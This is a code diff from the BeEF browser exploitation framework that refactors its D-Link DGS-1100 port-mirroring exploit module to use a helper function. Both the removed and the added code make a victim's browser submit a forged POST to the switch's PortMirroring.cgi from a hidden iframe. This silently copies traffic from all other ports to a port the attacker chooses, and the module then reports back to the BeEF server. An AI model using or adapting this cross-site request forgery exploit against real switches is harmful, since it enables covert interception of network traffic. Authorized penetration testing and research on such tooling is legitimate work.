Converting to use XsrfForm

modules/exploits/switch/dlink_dgs_1100_port_mirroring/command.js

@@ -10,45 +10,17 @@ beef.execute(function() {
   var totalports = parseInt('<%= @totalports %>');
   var mirrorport = parseInt('<%= @mirrorport %>');
 
-  var dlink_dgs_iframe = beef.dom.createInvisibleIframe();
-
-  var form = document.createElement('form');
-  form.setAttribute('action', base + "/cgi/PortMirroring.cgi");
-  form.setAttribute('method', 'POST');
-
-  var input = null;
-
-  input = document.createElement('input');
-  input.setAttribute('type', 'hidden');
-  input.setAttribute('name', 'cEn');
-  input.setAttribute('value', 1);
-  form.appendChild(input);
-
-  input = document.createElement('input');
-  input.setAttribute('type', 'hidden');
-  input.setAttribute('name', 'sTagP');
-  input.setAttribute('value', mirrorport);
-  form.appendChild(input);
-
-  input = document.createElement('input');
-  input.setAttribute('type', 'hidden');
-  input.setAttribute('name', 'sMode');
-  input.setAttribute('value', 2);
-  form.appendChild(input);
-
   var mask = '';
   for (var i = 1; i <= totalports; i++) {
     mask += i == mirrorport ? "0" : "1";
   }
 
-  input = document.createElement('input');
-  input.setAttribute('type', 'hidden');
-  input.setAttribute('name', 'SrcLst');
-  input.setAttribute('value', mask);
-  form.appendChild(input);
-
-  dlink_dgs_iframe.contentWindow.document.body.appendChild(form);
-  form.submit();
+  var dlink_dgs_iframe = beef.dom.createIframeXsrfForm(base + '/cgi/PortMirroring.cgi', 'POST', 'application/x-www-form-urlencoded', [
+    { type: 'hidden', name: 'cEn', value: 1 },
+    { type: 'hidden', name: 'sTagP', value: mirrorport },
+    { type: 'hidden', name: 'sMode', value: 2 },
+    { type: 'hidden', name: 'SrcLst', value: mask }
+  ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");